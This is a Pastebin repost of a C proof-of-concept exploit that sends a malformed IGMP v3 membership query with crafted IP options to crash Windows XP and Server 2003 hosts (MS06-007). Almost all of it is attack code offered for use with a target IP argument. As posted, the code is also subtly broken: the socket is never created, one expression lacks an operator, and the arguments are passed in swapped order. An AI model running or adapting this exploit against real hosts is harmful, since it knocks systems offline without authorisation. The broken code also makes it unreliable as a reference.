API tools faq
paste
Advertisement
FlyFar

IGMP v3.0 DoS Exploit - The Byzantine Attack

FlyFar
Jul 22nd, 2023
1,080
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 3.58 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. /*
  2. IGMP v3 DoS Exploit
  3.  
  4. ref: http://www.juniper.net/security/auto/vulnerabilities/vuln2866.html
  5. ref: http://www.microsoft.com/technet/security/Bulletin/MS06-007.mspx
  6.  
  7. by Alexey Sintsov (dookie@inbox.ru)
  8.  
  9. Req:
  10. Administrator rights on system
  11. Windows Firewall off (for sending RAW packets)
  12.  
  13. Affected Products:
  14. Microsoft Corporation Windows XP All
  15. Microsoft Corporation Windows Server 2003 All
  16. */
  17.  
  18.  
  19. #include <stdio.h>
  20. #include <sys/socket.h>
  21.  
  22. typedef struct iphdr
  23. {
  24. unsigned char verlen; // IP version & length
  25. unsigned char tos; // Type of service
  26. unsigned short total_len; // Total length of the packet
  27. unsigned short ident; // Unique identifier
  28. unsigned short frag_and_flags; // Flags
  29. unsigned char ttl; // Time to live
  30. unsigned char proto; // Protocol (TCP, UDP etc)
  31. unsigned short checksum; // IP checksum
  32. unsigned int sourceIP; // Source IP
  33. unsigned int destIP; // Destination IP
  34. unsigned short options[2];
  35.  
  36. } IPHEADER;
  37.  
  38. typedef struct igmphdr {
  39. unsigned char type;
  40. unsigned char code;
  41. unsigned short checksum;
  42. unsigned long group;
  43. unsigned char ResvSQVR;
  44. unsigned char QQIC;
  45. unsigned short num;
  46. unsigned long addes;
  47.  
  48. } IGMPHEADER;
  49.  
  50. USHORT checksum(USHORT *buffer, int size)
  51. {
  52. unsigned long cksum=0;
  53.  
  54. while (size > 1) {
  55. cksum += *buffer++;
  56. size -= sizeof(USHORT);
  57. }
  58.  
  59. if (size)
  60. cksum += *(UCHAR*)buffer;
  61.  
  62. cksum = (cksum >> 16) + (cksum & 0xffff);
  63. cksum += (cksum >>16);
  64.  
  65. return (USHORT)(~cksum);
  66. }
  67.  
  68. int sendIGMP(char* a, char* b)
  69. {
  70. unsigned int dst_addr, src_addr;
  71.  
  72. IPHEADER ipHeader;
  73. IGMPHEADER igmpHeader;
  74. dst_addr=inet_addr (b);
  75. src_addr=inet_addr (a);
  76.  
  77. char szSendBuf[60]={0};
  78. int rect;
  79.  
  80. SOCKET sock;
  81.  
  82. BOOL flag=TRUE;
  83. if (setsockopt(sock,IPPROTO_IP,2,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) {
  84. printf("Set options error");
  85. closesocket(sock);
  86. WSACleanup();
  87. return FALSE;
  88. }
  89.  
  90. SOCKADDR_IN ssin;
  91. memset(&ssin, 0, sizeof(ssin));
  92. ssin.sin_family=AF_INET;
  93. ssin.sin_port=htons(99);
  94. ssin.sin_addr.s_addr=dst_addr;
  95.  
  96. ipHeader.verlen=(4<<4 sizeof(ipHeader)/sizeof(unsigned long));
  97. ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(igmpHeader));
  98.  
  99. ipHeader.ident=htons(0);
  100.  
  101. ipHeader.frag_and_flags=0;
  102.  
  103. ipHeader.ttl=128;
  104. ipHeader.proto=IPPROTO_IGMP;
  105.  
  106. ipHeader.checksum=0;
  107.  
  108. ipHeader.tos=0;
  109.  
  110. ipHeader.destIP=dst_addr;
  111. ipHeader.sourceIP=src_addr;
  112.  
  113. //Ip options
  114. ipHeader.options[0]=htons(0x0000); //bug is here =)
  115. ipHeader.options[1]=htons(0x0000);
  116.  
  117. igmpHeader.type=0x11; //v3 Membership Query
  118. igmpHeader.code=5;
  119. igmpHeader.num=htons(1);
  120. igmpHeader.ResvSQVR=0x0;
  121. igmpHeader.QQIC=0;
  122. igmpHeader.group=inet_addr("0.0.0.0");
  123. igmpHeader.addes=dst_addr;
  124.  
  125. igmpHeader.checksum=0;
  126.  
  127. memcpy(szSendBuf, &igmpHeader, sizeof(igmpHeader));
  128.  
  129. igmpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(igmpHeader));
  130.  
  131. memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
  132. memcpy(szSendBuf+sizeof(ipHeader), &igmpHeader, sizeof(igmpHeader));
  133. memset(szSendBuf+sizeof(ipHeader)+sizeof(igmpHeader), 0, 4);
  134.  
  135. ipHeader.checksum=ntohs(checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(igmpHeader)));
  136.  
  137. memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
  138.  
  139. rect=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(igmpHeader),0,(LPSOCKADDR)&ssin, sizeof(ssin));
  140.  
  141. if (rect==SOCKET_ERROR) {
  142. printf("Send error: <%d>\n",WSAGetLastError());
  143. closesocket(sock);
  144. return 0;
  145. }
  146.  
  147. closesocket(sock);
  148.  
  149.  
  150. return 1;
  151. }
  152.  
  153. main(int argc, char **argv)
  154. {
  155. if(argc<2)
  156. {
  157. printf("\nIGMP v3 DoS Exploit (MS06-007) by Alexey Sintsov(dookie@inbox.ru)\n\n");
  158. printf("Usage:\n");
  159. printf("c:\\igmps.exe <target ip> <source ip>\n\n");
  160. exit(0);
  161. }
  162.  
  163. sendIGMP(argv[2], argv[1]);
  164. return 0;
  165. }
Tags: Exploit DoS IMGP
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!